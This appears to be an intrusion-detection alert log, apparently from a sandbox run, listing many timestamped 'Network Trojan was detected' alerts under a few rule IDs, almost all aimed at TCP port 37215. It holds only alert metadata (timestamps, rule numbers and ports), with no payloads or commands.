              Timestamp:05/24/24-10:59:10.700093
              SID:2835222
              Source Port:55848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456308
              SID:2829579
              Source Port:53450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.249953
              SID:2835222
              Source Port:37232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118497
              SID:2829579
              Source Port:43658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483787
              SID:2829579
              Source Port:36084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535865
              SID:2829579
              Source Port:36104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.070059
              SID:2829579
              Source Port:50766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245747
              SID:2835222
              Source Port:35622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150690
              SID:2835222
              Source Port:45232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.825660
              SID:2835222
              Source Port:41762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671685
              SID:2835222
              Source Port:55102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520291
              SID:2835222
              Source Port:55888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.546777
              SID:2835222
              Source Port:48478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.756467
              SID:2829579
              Source Port:58988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662527
              SID:2835222
              Source Port:33724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449160
              SID:2835222
              Source Port:37492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856951
              SID:2829579
              Source Port:48634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394655
              SID:2829579
              Source Port:57836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433655
              SID:2835222
              Source Port:33226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101328
              SID:2829579
              Source Port:39624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549685
              SID:2835222
              Source Port:39742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.804697
              SID:2835222
              Source Port:39442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.375081
              SID:2835222
              Source Port:59954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517306
              SID:2829579
              Source Port:45196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536880
              SID:2835222
              Source Port:48142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574640
              SID:2835222
              Source Port:33524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.080382
              SID:2829579
              Source Port:40862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693255
              SID:2835222
              Source Port:35488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764515
              SID:2835222
              Source Port:51118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920881
              SID:2829579
              Source Port:38654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.589275
              SID:2829579
              Source Port:60578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.108932
              SID:2835222
              Source Port:43300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.868610
              SID:2829579
              Source Port:54748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.526909
              SID:2829579
              Source Port:59960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.803113
              SID:2835222
              Source Port:47126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.991707
              SID:2835222
              Source Port:42956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.377668
              SID:2835222
              Source Port:51020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460462
              SID:2835222
              Source Port:38574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396326
              SID:2829579
              Source Port:56390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517195
              SID:2829579
              Source Port:42632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.921016
              SID:2835222
              Source Port:53252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445061
              SID:2829579
              Source Port:44218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154086
              SID:2835222
              Source Port:49684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.205855
              SID:2835222
              Source Port:42278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549835
              SID:2829579
              Source Port:34938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517972
              SID:2835222
              Source Port:38004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536638
              SID:2829579
              Source Port:40848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.149117
              SID:2829579
              Source Port:43396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.518934
              SID:2835222
              Source Port:51422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536820
              SID:2835222
              Source Port:47380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.105666
              SID:2829579
              Source Port:56668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432351
              SID:2835222
              Source Port:41628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.533334
              SID:2829579
              Source Port:36174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485297
              SID:2835222
              Source Port:37272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.992178
              SID:2835222
              Source Port:36348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.377232
              SID:2829579
              Source Port:47130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.696983
              SID:2835222
              Source Port:37058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188375
              SID:2829579
              Source Port:33186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725103
              SID:2829579
              Source Port:36266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.061561
              SID:2835222
              Source Port:37366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.077491
              SID:2829579
              Source Port:37700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.250820
              SID:2835222
              Source Port:59846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.168158
              SID:2835222
              Source Port:56560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547871
              SID:2835222
              Source Port:55966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663715
              SID:2829579
              Source Port:52976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098266
              SID:2829579
              Source Port:55810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.127604
              SID:2835222
              Source Port:34568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.123162
              SID:2829579
              Source Port:33306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341113
              SID:2829579
              Source Port:56822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550727
              SID:2829579
              Source Port:58434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661923
              SID:2835222
              Source Port:35142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189446
              SID:2829579
              Source Port:39626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358933
              SID:2835222
              Source Port:55810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.681303
              SID:2829579
              Source Port:53368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579668
              SID:2835222
              Source Port:35968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859492
              SID:2829579
              Source Port:36230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857793
              SID:2835222
              Source Port:41620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504674
              SID:2835222
              Source Port:34318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098165
              SID:2829579
              Source Port:53004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.168709
              SID:2829579
              Source Port:36380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300322
              SID:2829579
              Source Port:54400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062703
              SID:2835222
              Source Port:46826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.581812
              SID:2829579
              Source Port:60170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279191
              SID:2829579
              Source Port:33632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.377326
              SID:2829579
              Source Port:59156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.045245
              SID:2835222
              Source Port:39430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235466
              SID:2835222
              Source Port:43216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.422201
              SID:2829579
              Source Port:45640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.096715
              SID:2829579
              Source Port:43090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231726
              SID:2835222
              Source Port:33988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572433
              SID:2835222
              Source Port:43344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430553
              SID:2829579
              Source Port:48936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347764
              SID:2835222
              Source Port:39244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596263
              SID:2829579
              Source Port:54052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396670
              SID:2829579
              Source Port:42220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.285062
              SID:2835222
              Source Port:48984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474607
              SID:2829579
              Source Port:33168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520265
              SID:2829579
              Source Port:57626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.115900
              SID:2835222
              Source Port:33060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099747
              SID:2829579
              Source Port:54024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.423383
              SID:2829579
              Source Port:36514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400423
              SID:2835222
              Source Port:39922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.253969
              SID:2829579
              Source Port:47532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.685274
              SID:2829579
              Source Port:49428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.254405
              SID:2829579
              Source Port:58950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662019
              SID:2835222
              Source Port:50442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343075
              SID:2829579
              Source Port:35046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.349870
              SID:2829579
              Source Port:57716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.743087
              SID:2829579
              Source Port:32888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.269895
              SID:2835222
              Source Port:50180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661026
              SID:2835222
              Source Port:35892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100636
              SID:2829579
              Source Port:42950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.483117
              SID:2829579
              Source Port:55240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.482980
              SID:2835222
              Source Port:41460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.928904
              SID:2829579
              Source Port:42616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148549
              SID:2835222
              Source Port:44148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.586497
              SID:2835222
              Source Port:44796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724969
              SID:2829579
              Source Port:57088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.117284
              SID:2829579
              Source Port:53604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270588
              SID:2829579
              Source Port:41424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343646
              SID:2835222
              Source Port:58690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575826
              SID:2829579
              Source Port:37924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671801
              SID:2835222
              Source Port:48236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516547
              SID:2829579
              Source Port:39044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575776
              SID:2835222
              Source Port:43526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118536
              SID:2835222
              Source Port:45908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.972573
              SID:2835222
              Source Port:39352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624133
              SID:2835222
              Source Port:34646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165613
              SID:2829579
              Source Port:42894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.819799
              SID:2829579
              Source Port:55814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116535
              SID:2835222
              Source Port:60250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727378
              SID:2829579
              Source Port:39384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.196907
              SID:2835222
              Source Port:40350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481415
              SID:2829579
              Source Port:47636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.161327
              SID:2835222
              Source Port:56432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.123830
              SID:2829579
              Source Port:59062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113712
              SID:2829579
              Source Port:56212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098139
              SID:2835222
              Source Port:44706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103676
              SID:2835222
              Source Port:52222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235466
              SID:2829579
              Source Port:38110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279687
              SID:2835222
              Source Port:51406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430719
              SID:2829579
              Source Port:53276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.156379
              SID:2829579
              Source Port:59696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.382783
              SID:2829579
              Source Port:39264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.918263
              SID:2829579
              Source Port:36956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.535990
              SID:2829579
              Source Port:46844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099689
              SID:2829579
              Source Port:39830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878194
              SID:2829579
              Source Port:38984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.641636
              SID:2835222
              Source Port:38310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.114114
              SID:2829579
              Source Port:38362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.068073
              SID:2829579
              Source Port:53746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099814
              SID:2829579
              Source Port:46210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576466
              SID:2835222
              Source Port:56922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503382
              SID:2835222
              Source Port:53986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.749212
              SID:2835222
              Source Port:52528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.162333
              SID:2829579
              Source Port:51930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.120449
              SID:2835222
              Source Port:48900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519562
              SID:2829579
              Source Port:56118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.761851
              SID:2829579
              Source Port:41726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.390719
              SID:2835222
              Source Port:52656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.643016
              SID:2829579
              Source Port:54672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727303
              SID:2835222
              Source Port:49218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.451176
              SID:2835222
              Source Port:51658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150557
              SID:2835222
              Source Port:53322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432273
              SID:2835222
              Source Port:41532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.491499
              SID:2829579
              Source Port:55426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537132
              SID:2829579
              Source Port:40624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.302907
              SID:2835222
              Source Port:49734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575195
              SID:2829579
              Source Port:51226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189421
              SID:2835222
              Source Port:47720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553660
              SID:2829579
              Source Port:36482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517284
              SID:2835222
              Source Port:57818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623579
              SID:2829579
              Source Port:45366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060833
              SID:2835222
              Source Port:39418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.544057
              SID:2829579
              Source Port:58332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.064535
              SID:2835222
              Source Port:48990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278345
              SID:2829579
              Source Port:32960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.736551
              SID:2030490
              Source Port:44762
              Destination Port:1235
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055309
              SID:2829579
              Source Port:43518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505171
              SID:2835222
              Source Port:39800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165163
              SID:2835222
              Source Port:53578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.396407
              SID:2829579
              Source Port:42346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858351
              SID:2835222
              Source Port:45834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165729
              SID:2835222
              Source Port:57458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313779
              SID:2835222
              Source Port:44078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.975205
              SID:2829579
              Source Port:38848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187539
              SID:2835222
              Source Port:47430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920731
              SID:2835222
              Source Port:36760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693151
              SID:2835222
              Source Port:36242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625630
              SID:2829579
              Source Port:59502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625586
              SID:2835222
              Source Port:56582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856598
              SID:2829579
              Source Port:46310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.828643
              SID:2829579
              Source Port:57270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.121242
              SID:2835222
              Source Port:56488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329775
              SID:2835222
              Source Port:47342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579645
              SID:2829579
              Source Port:36624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.818010
              SID:2835222
              Source Port:58582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062262
